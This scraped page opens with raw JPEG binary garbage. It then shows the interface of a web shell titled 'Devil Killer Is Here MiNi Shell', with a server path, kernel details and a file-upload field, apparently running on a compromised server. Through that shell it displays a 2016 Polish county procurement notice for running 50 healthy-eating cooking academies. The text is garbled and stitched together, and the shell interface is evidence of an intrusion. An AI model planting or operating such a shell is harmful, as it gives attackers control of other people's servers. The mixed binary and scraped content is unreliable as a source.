JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160222/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160222/17555-N-2016.html

<p class="kh_header"><b>Piotrków Trybunalski: Uruchomienie i prowadzenie na terenie powiatu piotrkowskiego 50 filii Akademii Zdrowego Żywienia na potrzeby realizacji przez Powiat Piotrkowski projektu pn.: Twoje Serce Twoim Życiem -  Program Zmniejszenia Nierówności w Zdrowiu Mieszkańców Powiatu Piotrkowskiego z Ryzykiem Wystąpienia Chorób Układu Krążenia współfinansowanego w ramach Programu PL13 Ograniczanie społecznych nierówności w zdrowiu ze środków Norweskiego Mechanizmu Finansowego oraz budżetu państwa w podziale na Część I, II, III, IV, V.</b><br>
<b>Numer ogłoszenia: 17555 - 2016; data zamieszczenia: 22.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Piotrkowski , ul. Dąbrowskiego 7, 97-300 Piotrków Trybunalski, woj. łódzkie, tel. 44 732 88 00, faks 44 732 88 03.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-piotrkowski.bip.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Uruchomienie i prowadzenie na terenie powiatu piotrkowskiego 50 filii Akademii Zdrowego Żywienia na potrzeby realizacji przez Powiat Piotrkowski projektu pn.: Twoje Serce Twoim Życiem -  Program Zmniejszenia Nierówności w Zdrowiu Mieszkańców Powiatu Piotrkowskiego z Ryzykiem Wystąpienia Chorób Układu Krążenia współfinansowanego w ramach Programu PL13 Ograniczanie społecznych nierówności w zdrowiu ze środków Norweskiego Mechanizmu Finansowego oraz budżetu państwa w podziale na Część I, II, III, IV, V..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Uruchomienie i prowadzenie na terenie powiatu piotrkowskiego 50 filii Akademii Zdrowego Żywienia (AZŻ)  na potrzeby realizacji przez Powiat Piotrkowski projektu pn.: Twoje Serce Twoim Życiem - Program Zmniejszenia Nierówności w Zdrowiu Mieszkańców Powiatu Piotrkowskiego z Ryzykiem Wystąpienia Chorób Układu Krążenia.
2.Przedmiot zamówienia został podzielony na 5 części:
Lp.Wyszczególnienie	Ilość spotkań ilość akademii, filii
Uruchomienie i prowadzenie na terenie powiatu piotrkowskiego 50 filii Akademii Zdrowego Żywienia - AZŻ	16 spotkań po 4 godz.
1 AZŻ
1.Część I - 10 AZŻ na ternie gmin: Aleksandrów, Sulejów, Wolbórz	160 spotkań po 4 godz. każde 10 AZŻ
2.Część II - 10 AZŻ na ternie gmin: Czarnocin, Grabica	160 spotkań po 4 godz. każde 10 AZŻ
3.Część III - 10 AZŻ na ternie gmin: Moszczenica	160 spotkań po 4 godz. każde 10 AZŻ
4.Część IV - 8 AZŻ na ternie gmin: Gorzkowice, Ręczno, Łęki Szlacheckie128 spotkań po 4 godz. każde 8 AZŻ
5.Część V - 12 AZŻ na ternie gmin: Wola Krzysztoporska, Rozprza	192 spotkania po 4 godz. każde  12 AZŻ
Koszt uruchomienia i prowadzenia 50 Akademii Zdrowego Żywienia	800 spotkań po 4 godz. każde   50 AZŻ
3.W ramach projektu realizowany jest program promocji zdrowego stylu życia skierowany do osób zagrożonych zapadalnością na choroby układu krążenia.
4.Akademie Zdrowego Żywienia to jedna z form wsparcia ogólnodostępnego, która ma za zadanie promować i zachęcać uczestników projektu oraz ogół społeczności lokalnych do zmiany zachowań zdrowotnych poprzez umożliwienie udziału w zajęciach kulinarnych 
z zakresu zdrowego żywienia.
5.Akademie Zdrowego Żywienia dedykowane są dla:
1)osób, które znalazły się w grupie docelowej Programu tj. osoby w wieku 25 - 55 lat, korzystające ze świadczeń rodzinnych lub świadczeń ośrodka pomocy społecznej z tytułu dochodu,
2)osób pełnoletnich, które nie należą do grupy docelowej, a są mieszkańcami danej gminy i wykazują chęć udziału w proponowanych zajęciach kulinarnych.
6.Udział w zajęciach jest dobrowolny, dlatego bardzo ważna przy realizacji zamówienia będzie promocja prowadzonych zajęć, ich atrakcyjność oraz dopasowanie do potrzeb potencjalnych uczestników.
7.Z uwagi na fakt, że zajęcia będą miały charakter dobrowolny, Zamawiający zastrzega sobie prawo do zmiany (zwiększenia lub zmniejszenia) ilości godzin w ramach zajęć wskazanych w zamówieniu, dlatego też podane zestawienie ilościowe nie jest wiążące dla Zamawiającego.
8.Założenia organizacyjne i wymagania dotyczące realizacji przedmiotu zamówienia.
1)Akademia Zdrowego Żywienia (AZŻ) organizacyjnie stanowić ma formę powszechnych, ogólnodostępnych punktów, w których prowadzone będą przez instruktora (trenera) gotowania zorganizowane zajęcia z zakresu nauki i praktycznego zastosowania technik i zasad zdrowego żywienia.
2)W ramach zajęć przewiduje się możliwość zorganizowania wszelkich zajęć, które sprzyjać będą nauce i wdrażaniu do codziennego życia zasad zdrowego żywienia, najlepiej w oparciu o produkty, które do tej pory były stosowane i są dostępne w kuchniach osób uczestniczących w zajęciach. Dopuszcza się możliwość zachęcania do zmian również poprzez wprowadzanie nowych produktów dotychczas niestosowanych lub pomijanych, przy czym wówczas należy wziąć pod uwagę na ile wprowadzane artykuły są dostępne cenowo dla uczestników.
3)Opracowując programy zajęć należy uwzględnić różnorodność form (przystawki, przekąski, dania główne, desery, soki itp.), technik przygotowywanych posiłków oraz produkty, które są zalecane w przypadku chorób układu krążenia 
i rekomendowane przez Instytut Żywności i Żywienia www.izz.waw.pl 
4)Wykonawca będzie zobowiązany do przedstawienia i zaakceptowania przez Zamawiającego przygotowanego w porozumieniu z lokalnymi partnerami (kołami gospodyń wiejskich) harmonogramu i programu zajęć.
5)Planując programy zajęć w ramach Akademii Zdrowego Żywienia Wykonawca powinien wziąć pod uwagę porę roku, wykorzystując regionalne produkty i surowce sezonowe.
6)Planowana częstotliwość zajęć z instruktorem (trenerem) gotowania łącznie 
4 godziny (godzina zajęć wynosi 60 min.), co najmniej 2 razy w miesiącu (co 2 tygodnie) przez cały czas realizacji zamówienia. Należy uwzględnić możliwość prowadzenia zajęć w weekendy, jeśli współpracujące koła gospodyń wiejskich lub osoby biorące udział w projekcie widziałyby taką potrzebę.
7)Łącznie przez cały okres działalności Akademii Zdrowego Żywienia planowane jest zorganizowanie minimum 16 spotkań, których łączna liczba godzin wyniesie 64 h w każdej z filii AZŻ przez okres 8 miesięcy licząc od marca 2016 r. do listopada
2016 r.
8)Planuje się, że w każdej z 11 gmin powiatu piotrkowskiego łącznie, w porozumieniu z Kołami Gospodyń Wiejskich, którzy zadeklarowali współpracę na rzecz projektu, uruchomionych zostanie 50 filii Akademii Zdrowego Żywienia. Wykaz partnerów w podziale na poszczególne gminy dostępny jest na stronie projektu www.zdrowie.powiat-piotrkowski.pl - Akademie Zdrowego Żywienia lub w zakładce -Do pobrania.
9)Wykonawca organizując spotkania musi zapewnić:
promocję i informację o zajęciach;
miejsce spotkań;
trenera (instruktora) gotowania;
surowce oraz produkty żywnościowe niezbędne do przygotowania posiłków
i przeprowadzenia zajęć;
opracowywać i gromadzić w wersji papierowej i elektronicznej przepisy wszystkich potraw i posiłków przygotowywanych podczas zajęć.
10.Wykonawca jest zobowiązany również do:
1)przygotowania posiłków z wykorzystaniem własnego sprzętu lub/ i sprzętu udostępnionego przez współpracujące Koła Gospodyń Wiejskich,
2)komponowania i przygotowywania posiłków wyłącznie przy użyciu produktów spełniających normy jakości produktów spożywczych o ważnym okresie przydatności do spożycia, 
w opakowaniach posiadających stosowne atesty,
3)przestrzegania przepisów prawnych w zakresie przechowywania i przygotowywania artykułów spożywczych (m. in. ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (tekst jednolity: Dz. U. z 2015 r., poz. 594 z późn. zm.), wynikające z realizacji dobrych praktyk produkcyjnych (GMP) i dobrych praktyk higienicznych (GHP) oraz Systemu Analizy Zagrożeń i Krytycznych Punktów Kontroli (HACCP) mających na celu m. in.: zapewnienie bezpieczeństwa żywności oraz przeprowadzenie procesu identyfikowalności produktów.
11.Zamawiający zastrzega sobie prawo do oceny, kontroli i weryfikacji wszystkich parametrów świadczonej usługi - na każdym etapie jej realizacji oraz w każdej chwili w miejscu przygotowywania posiłków i ich dostawy. 
12.Zamawiający uprawniony będzie do udzielania Wykonawcy w razie potrzeby niezbędnych wskazówek. 
13.Sprzęt w postaci robotów kuchennych wielofunkcyjnych oraz garnków do gotowania na parze na każdą AZŻ (1 sztuka każdego sprzętu na 1 AZŻ) zapewni Zamawiający, przekazując wymieniony sprzęt na rzecz zdeklarowanych do współpracy partnerów lokalnych.
14.W celu realizacji zadania Zamawiający powierzy Wykonawcy przetwarzanie danych osobowych osób deklarujących uczestnictwo w projekcie w zakresie i celu niezbędnym do dokumentowania prowadzonej w ramach Akademii Zdrowego Żywienia.
15.Dokumentowanie zajęć:
Dzienniki zajęć  (wg wzoru dziennika lekcyjnego) obecności z imiennymi wpisami uczestników. Dziennik prowadzi osoba prowadząca zajęcia (z zaznaczeniem osób, które są w grupie docelowej lub/i jest w Programie).
Oświadczenia uczestników. Wzór oświadczenia dostarczy Zamawiający.
16.Wymagania dotyczące realizacji przedmiotu zamówienia wobec Wykonawcy:
1.Prowadzenie zajęć w atrakcyjnej i ciekawej dla uczestników formie,
2.Prowadzenie odpowiedniej dokumentacji projektowej.
3.Poinformowanie na wstępie zajęć, że przedsięwzięcie organizowane jest z udziałem środków finansowych pochodzących z funduszy norweskich i budżetu państwa;
4.Opracowanie oraz przedstawienie Zamawiającemu do akceptacji i wprowadzenie do stosowania regulaminu zasad uczestnictwa osób biorących udział w poszczególnych zajęciach prowadzonych przez Akademie Zdrowego Żywienia.
5.Regulaminy te winny w szczególności zawierać prawa i obowiązki osób uczestniczących w zajęciach, opis poszczególnych zajęć, dane organizatora zajęć.
6.Dokonanie ewaluacji zajęć w oparciu o ankiety wypełniane przez uczestników na początku i na końcu zajęć (ewaluacja powinna być dokonana na próbie co najmniej 20 uczestników), dwa razy, na początku uruchomienia AZŻ i na końcu.
7.Kwestionariusze ankiet zostaną dostarczone przez Zamawiającego w ilości uzgodnionej 
z realizatorem zajęć.
17.Przedstawianie miesięcznego sprawozdania (wzór dostarczy Zamawiający)
   w wersji elektronicznej i papierowej w zakresie:
liczby odbytych godzin w ramach zajęć w AR,
liczby osób uczestniczących w zajęciach z zaznaczeniem osób spełniających kryteria grupy docelowej lub i uczestniczących w programie badań profilaktycznych (ankietowych) w podziale na kobiety i mężczyzn oraz poszczególne akademie, w terminie 7 dni licząc od dnia zakończenia danego miesiąca, którego dotyczy 
z zastrzeżeniem, że ostatni raport zostanie przedstawiony zamawiającemu nie później niż do 10.12.2016 r.
18.Przestrzeganie obowiązującego regulaminu dotyczącego sposobu korzystania
z udostępnionych obiektów oraz zachowania zasad bezpieczeństwa i higieny podczas zajęć.
19.Stałej współpracy z Biurem Projektu oraz właściwym miejscowo dla danej AZŻ lokalnym kołem gospodyń wiejskich oraz bieżącego przekazywania wszelkich informacji mających wpływ na prawidłową realizacje powierzonego zadania.
20.Przekazania całej dokumentacji Zamawiającemu, w ciągu siedmiu dni licząc od dnia zakończenia działalności AZŻ w ramach zamówienia, ale nie później niż do dnia 10.12.2016 r.
21.Wykonawca zobowiązuje się do zamieszczenia logotypów funduszy norweskich zgodnie z Podręcznikiem Komunikacji i Identyfikacji Wizualnej oraz Wymogami dotyczącymi informacji i promocji (załącznik nr 4 do regulacji na temat wdrażania Mechanizmu Finansowego EOG oraz Norweskiego Mechanizmu Finansowego na lata 2009-2014) dostępnym na stronie www.eog.gov.pl strony dowiedz-sie-wiecej-o-funduszach wez-udzial-w-promocji-funduszy zasady-promocji
22.Zamieszczania na przeznaczonej do tego celu tablicy informacyjnej (tablice zostaną dostarczone przez Zamawiającego) wszelkich bieżących informacji dot. działalności Akademii Zdrowego Żywienia w miejscu jej działalności.
23.Wykonawcy są zobowiązani do starannego zapoznania się z przedmiotem zamówienia, wszystkimi czynnikami mającymi wpływ na kształtowanie się cen ofertowych oraz warunkami wykonania zamówienia.
24.Zamawiający zastrzega sobie możliwość bieżącego monitorowania przebiegu prowadzonych spotkań i konsultacji w trakcie ich trwania, mającego na celu sprawdzenie prawidłowości realizacji przedmiotu zamówienia.
25.Dla zamówienia Wykonawca kalkulując cenę powinien uwzględnić wszystkie koszty związane z realizacją zamówienia tj.: koszt osoby prowadzącej spotkania, zakup produktów (surowców) żywnościowych niezbędnych do realizacji zajęć, dojazd do miejsca działalności akademii, prowadzenia dokumentacji oraz inne koszty niezbędne do prawidłowej realizacji zamówienia, a wcześniej nie wymienione..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenie zamówień uzupełniających na podst. art. 67 ust. 1 pkt. 6).</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium do niniejszego postępowania.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek posiadania uprawnień do wykonywania określonej działalności lub czynności będzie spełniony jeżeli Wykonawca: a) posiada przygotowanie zawodowe w zawodzie kucharz, technik gastronomiczny, dietetyk, technik żywienia oraz inne kwalifikacje potwierdzające kwalifikacje kulinarne, w tym posiadanie kursów specjalistycznych 
z zakresu żywienia, aktualne badania lekarskie wymagane do pracy w zbiorowym żywieniu oraz załączy podpisane Oświadczenie o spełnianiu warunków udziału 
w postępowaniu - Załącznik nr 2 do SIWZ. Ocena spełnienia warunków zostanie dokonana według formuły spełnia, nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek posiadania wiedzy i doświadczenia do wykonywania określonej działalności lub czynności będzie spełniony jeżeli Wykonawca: a) posiada doświadczenie w prowadzeniu  zajęć kulinarnych lub realizacji programów promujących zasady zdrowego żywienia, posiada dodatkowe kwalifikacje do pracy w zakresie prewencji zachowań prozdrowotnych oraz załączy podpisane Oświadczenie o spełnianiu warunków udziału 
w postępowaniu - Załącznik nr 2 do SIWZ. Ocena spełnienia warunków zostanie dokonana według formuły spełnia, nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, gdy Wykonawca złoży oświadczenie 
o spełnianiu warunków udziału w postępowaniu - Załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dysponowania osobami zdolnymi do wykonania zamówienia będzie spełniony jeżeli Wykonawca oświadczy, iż  dysponuje lub będzie dysponować zespołem osób posiadających kwalifikacje uprawniające je do prowadzenia zaproponowanych przez Wykonawcę zajęć kulinarnych lub realizacji programów promujących zasady zdrowego żywienia oraz załączy -  Wykaz osób - Załącznik nr 6 do SIWZ -  przewidywanych do realizacji zamówienia. Z dostarczonych dokumentów musi jednoznacznie wynikać, 
iż warunki Wykonawca spełnił. Ocena spełnienia warunków zostanie dokonana według formuły spełnia, nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, gdy Wykonawca złoży oświadczenie 
o spełnianiu warunków udziału w postępowaniu - Załącznik nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Wartość merytoryczna - 40</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat-piotrkowski.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe
97-300 Piotrków Trybunalski
ul. Dąbrowskiego 7.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.03.2016 godzina 11:00, miejsce: Biuro Obsługi Interesanta, sala 112
Starostwo Powiatowe
97-300 Piotrków Trybunalski
ul. Dąbrowski 7.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn.: Twoje Serce Twoim Życiem -  Program Zmniejszania Nierówności w Zdrowiu Mieszkańców Powiatu Piotrkowskiego z Ryzykiem Wystąpienia Chorób Układu Krążenia współfinansowany w ramach Programu PL13 Ograniczanie społecznych nierówności w zdrowiu ze środków Norweskiego Mechanizmu Finansowego oraz budżetu państwa..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> 10 Akademii Zdrowego Żywienia  na terenie gmin: Aleksandrów, Sulejów, Wolbórz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Uruchomienie i prowadzenie na terenie powiatu piotrkowskiego 50 filii Akademii Zdrowego Żywienia na potrzeby realizacji przez Powiat Piotrkowski projektu pn.: Twoje Serce Twoim Życiem - Cześć nr I - 10 AZŻ na terenie gmin: Aleksandrów, Sulejów, Wolbórz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Wartość merytoryczna - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> 10 Akademii Zdrowego Żywienia na terenie gmin: Czarnocin, Grabica.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Uruchomienie i prowadzenie na terenie powiatu piotrkowskiego 50 filii Akademii Zdrowego Żywienia na potrzeby realizacji przez Powiat Piotrkowski projektu pn.: Twoje Serce Twoim Życiem - Część nr II - 10 AZŻ na terenie gmin: Czarnocin, Grabica.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Wartość merytoryczna - 40</li>
</ul>
